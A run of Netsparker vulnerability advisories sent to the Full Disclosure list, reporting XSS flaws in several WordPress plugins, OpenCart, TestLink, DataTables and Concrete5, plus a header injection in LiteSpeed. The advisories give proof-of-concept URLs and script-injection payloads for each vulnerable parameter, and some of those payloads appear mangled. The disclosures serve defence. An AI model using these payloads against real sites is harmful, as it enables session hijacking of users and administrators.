[FD] BulletProof Security 53.3 - Security Advisory - Multiple XSS Vulnerabilities

2016-05-10 Thread Onur Yilmaz 
Information

Advisory by Netsparker
Name: Multiple XSS Vulnerabilities in BulletProof Security
Affected Software : BulletProof Security
Affected Versions: v53.3 and possibly below
Vendor Homepage : https://wordpress.org/plugins/bulletproof-security/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
Netsparker Advisory Reference : NS-16-004

Technical Details

Proof of Concept URLs for XSS vulnerabilities in BulletProof Security v53.3:

URL 
/wordpress/wp-admin/admin.php?page=bulletproof-security/admin/security-log/security-log.php
Parameter Name user-agent-ignore
Parameter Type POST
Attack Pattern '"-->alert(0x001E32)

For more information on cross-site scripting vulnerabilities read the
article Cross-site Scripting (XSS).

Advisory Timeline

15 Mar 2016 - First Contact
23 Mar 2016 - Vendor Fixed
09 May 2016 - Advisory Released

Solution

Update the plugni.

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities. The Netsparker web
application security scanner is available in two editions; Netsparker
Desktop and Netsparker Cloud. Visit our website
https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] LiteSpeed Web Server - Security Advisory - HTTP Header Injection Vulnerability

2016-01-20 Thread Onur Yilmaz 
Information

Advisory by Netsparker
Name: HTTP Header Injection in LiteSpeed Web Server
Affected Software : LiteSpeed Web Server
Affected Versions: v5.1.0 and possibly below
Vendor Homepage : https://www.litespeedtech.com/
Vulnerability Type : HTTP Header Injection
Severity : Medium
Status : Fixed
CVE-ID : TBA
Netsparker Advisory Reference : NS-16-001

Description

While testing Netsparker, we spotted an HTTP Header Injection
vulnerability in LiteSpeed.

LiteSpeed Web Server v5.1.0 and possibly below are affected if
mod_userdir is enabled. This vulnerability can be exploited in various
ways depending on the application.

Technical Details

Proof of Concept URL for HTTP Header Injection in LiteSpeed Web Server:

/~%0d%0aSet-Cookie:Scanner=Netsparker%0d%0a

Advisory Timeline

15 Jan 2016 - First Contact
18 Jan 2016 - Vendor Fixed
20 Jan 2016 - Advisory Released

Solution

Patch released by LiteSpeed and annocunced here:
https://www.litespeedtech.com/products/litespeed-web-server/release-log.
Download the latest version.

Credits & Authors

This issue has been discovered by Ziyahan Albeniz  while testing
Netsparker Web Application Security Scanner
(https://www.netsparker.com).

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities, hence it does not report
any false positives. The Netsparker web application security scanner
is available in two editions; Netsparker Desktop and Netsparker Cloud.
Visit our website https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] OpenCart Security Advisory - XSS Vulnerabiltiy - CVE-2015-4671

2016-01-08 Thread Onur Yilmaz 
Information

Advisory by Netsparker
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.1.0.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-4671
Netsparker Advisory Reference : NS-15-023

Description

By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in user’s session. This means that the malicious hacker can change
the logged in user’s password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator’s session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in OpenCart v2.1.0.1:

/opencart/index.php?route=account/address/add
(zone_id - POST)

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

07/12/2015 - First Contact
16/12/2015 - Vendor Fixed
18/12/2015 - Advisory Released

Solution

https://github.com/opencart/opencart/commit/303fa88fe664ded4bf8753b997abd916f0a3c03f


Credits & Authors

These issues have been discovered by Ziyahan Albeniz while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker web application security scanners find and report security flaws
and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in
all websites and web applications, regardless of the platform and
technology they are built on. Netsparker scanning engine’s unique detection
and exploitation techniques allow it to be dead accurate in reporting
vulnerabilities. The Netsparker web application security scanner is
available in two editions; Netsparker Desktop and Netsparker Cloud. Visit
our website https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner 
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] TestLink Security Advisory - Multiple XSS Vulnerabilities - CVE-2015-7391

2015-10-08 Thread Onur Yilmaz 
Information

Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in TestLink 1.9.13
Affected Software : TestLink
Affected Versions: 1.9.1.3 and possibly below
Vendor Homepage : http://testlink.org/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-7391
Netsparker Advisory Reference : NS-15-016

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in TestLink 1.9.13:

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name  selected_end_date
Parameter Type  POST
Attack Pattern  '"-->alert(0x008360)

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name  selected_start_date
Parameter Type  POST
Attack Pattern  '"-->alert(0x007F5A)

/testlink-code-1.9.13/lib/testcases/containerEdit.php
Parameter Name  containerType
Parameter Type  POST
Attack Pattern  '"-->alert(0x0053E8)

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name  filter_tc_id
Parameter Type  POST
Attack Pattern  ">

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name  filter_testcase_name
Parameter Type  POST
Attack Pattern  '"-->alert(0x0050D4)

/testlink-code-1.9.13/lib/testcases/tcImport.php?containerID=2=1='"-->alert(0x004898)
Parameter Name  useRecursion
Parameter Type  GET
Attack Pattern  '"-->alert(0x004898)

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name  targetTestCase
Parameter Type  POST
Attack Pattern  ">

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name  created_by
Parameter Type  POST
Attack Pattern  ">alert(9)

/testlink-code-1.9.13/third_party/user_contribution/fakeRemoteExecServer/client4fakeXMLRPCTestRunner.php
Parameter Name  Referer
Parameter Type  HTTP Header
Attack Pattern  '"-->alert(0x00FF1E)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/cross-site-scripting-xss/

Advisory Timeline

15/09/2015 - First Contact
02/10/2015 - Vendor Fixed
05/10/2015 - Advisory Released

Solution

https://github.com/TestLinkOpenSourceTRMS/testlink-code/releases/tag/1.9.14

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner
(https://www.netsparker.com).

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities, hence it does not report
any false positives. The Netsparker web application security scanner
is available in two editions; Netsparker Desktop and Netsparker Cloud.
Visit our website https://www.netsparker.com for more information.

-- 
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DataTables Security Advisory - XSS Vulnerability - CVE-2015-6584

2015-09-10 Thread Onur Yilmaz 
Information

Advisory by Netsparker.
Name: XSS Vulnerability in DataTables
Affected Software : DataTables
Affected Versions : 1.10.8 and possibly below
Vendor Homepage : https://github.com/DataTables/DataTables
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-6584
Netsparker Advisory Reference : NS-15-014

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URL for XSS in DataTables:

Page: 6776.php
Parameter Name: scripts
Parameter Type: GET
Attack Pattern:
http://example.com/DataTables-master/media/unit_testing/templates/6776.php?scripts='"-->alert(0x00807E)

For more information on cross-site scripting (XSS) vulnerabilities
read the following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/cross-site-scripting-xss/

Advisory Timeline

04/09/2015 - First Contact
08/09/2015 - Vendor Fixed
09/09/2015 - Advisory Released

Credits & Authors

These issues have been discovered by Onur Yilmaz while testing
Netsparker Web Application Security Scanner
(https://www.netsparker.com).

About Netsparker

Netsparker finds and reports security flaws and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting vulnerabilities,
hence it is the first and only False Positive Free web application
security scanner.

-- 
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Concrete5 Security Advisory - Multiple XSS Vulnerabilities - CVE-2015-2250

2015-05-13 Thread Onur Yilmaz 
Information

Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Concrete5
Affected Software : Concrete5
Affected Versions: 5.7.3.1 and possibly below
Vendor Homepage : https://www.concrete5.org
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-2250
Netsparker Advisory Reference : NS-15-008

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URLs for cross-site scripting vulnerabilities in Concrete5:

URL: 
/concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success
Parameter Name: banned_word%5b%5d
Parameter Type: POST
Attack Pattern: '--/style/scRiptscRiptalert(0x000936)/scRipt

URL: 
/concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=level=channel='--/style/scRiptscRiptalert(0x0044C4)/scRiptlevel[]=600
Parameter Name: channel
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x0044C4)/scRipt

URL: 
/concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1pdID=3accessType='--/style/scRiptscRiptalert(0x00690C)/scRipt
Parameter Name: accessType
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x00690C)/scRipt

URL: /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon
Parameter Name: msCountry
Parameter Type: POST
Attack Pattern: '--/style/scRiptscRiptalert(0x00D064)/scRipt

URL: 
/concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='--/style/scRiptscRiptalert(0x00687C)/scRiptpkCategoryHandle=block_type
Parameter Name: accessType
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x00687C)/scRipt

URL: 
/concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3cID=1arHandle='--/style/scRiptscRiptalert(0x00D33A)/scRipt
Parameter Name: arHandle
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x00D33A)/scRipt

URL: /concrete5.7.3.1/index.php/dashboard/pages/single
Parameter Name: pageURL:
Parameter Type: POST
Attack Pattern: '--/style/scRiptscRiptalert(0x00627A)/scRipt

URL: 
/concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='--/style/scRiptscRiptalert(0x001D34)/scRiptcID=1
Parameter Name: arHandle
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x001D34)/scRipt

URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated
Parameter Name: SEARCH_INDEX_AREA_METHOD
Parameter Type: POST
Attack Pattern: ' onmouseover= alert(0x00047E)

URL: /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled
Parameter Name: unit
Parameter Type: POST
Attack Pattern: ' onmouseover= alert(0x000C5A)

URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1
Parameter Name: register_notification_email
Parameter Type: POST
Attack Pattern: ' onmouseover= alert(0xDE)

URL: 
/concrete5.7.3.1/index.php/dashboard/extend/connect/onmouseover=alert(0x00170E)
Parameter Name: URI-BASED
Parameter Type: Full URL:
Attack Pattern: /onmouseover=alert(0x00170E)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

05/03/2015 - First Contact
06/05/2015 - Vulnerability fixed
11/05/2015 - Advisory released

Solution

Download Concrete5 version 5.7.4 which includes fix for this vulnerability.

Credits  Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

-- 
Onur Yılmaz - Turkey Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS:

[FD] Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429

2015-05-09 Thread Onur Yilmaz 
Information

Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URL for DOM XSS in WordPress:

http://example.com/wordpress/wp-content/themes/twentyfifteen/genericons/example.html#img/src/onerror=alert(123)

For more information on DOM based cross-site scripting vulnerabilities
read the following article:
https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/

Advisory Timeline

22/04/2015 - First Contact
07/05/2015 - Vulnerability fixed
07/05/2014 - Advisory released

Solution

Download WordPress version 4.2.2 which includes fix for this vulnerability.

Credits  Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Banner Effect Header Security Advisory - XSS Vulnerability - CVE-2015-1384

2015-01-31 Thread Onur Yilmaz 
Information

Advisory by Netsparker.
Name: XSS Vulnerability in Banner Effect Header
Affected Software : Banner Effect Header
Affected Versions: 1.2.7 and possibly below
Vendor Homepage : https://wordpress.org/plugins/banner-effect-header/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1384
Netsparker Advisory Reference : NS-15-002

Description
---
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details
-
Proof of Concept URLs for XSS in Banner Effect Header:

URL: /wp-admin/options-general.php?page=BannerEffectOptions
Parameter Name: banner_effect_divid
Parameter Type: Post
Attack Pattern:  onclick=alert(1) 

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

21/01/2015 - First Contact
29/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution

Download version 1.2.8 which includes fix for this vulnerability.

Credits  Authors
-
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner  -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security flaws and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting vulnerabilities,
hence it is the first and only False Positive Free web application
security scanner. For more information visit our website on
https://www.netsparker.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Blubrry PowerPress Security Advisory - XSS Vulnerability - CVE-2015-1385

2015-01-29 Thread Onur Yilmaz 
Information

Advisory by Netsparker
Name: XSS Vulnerability in Blubrry PowerPress
Affected Software : Blubrry PowerPress
Affected Versions: 6.0 and possibly below
Vendor Homepage : https://wordpress.org/plugins/powerpress/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1385
Netsparker Advisory Reference : NS-15-001

Description
---
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user?s session. This means that the malicious
hacker can change the logged in user?s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator?s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner.


Proof of Concept URLs for XSS in Blubrry PowerPress WordPress plugin:

/wp-admin/admin.php?page=powerpress/powerpressadmin_categoryfeeds.phpaction=powerpress-editcategoryfeedcat=1';--/style/scRiptscRiptalert(0x014068)/scRipt

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

22/01/2015 - First Contact
26/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution

Download version 6.0.1 which includes fix for this vulnerability.

Credits  Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/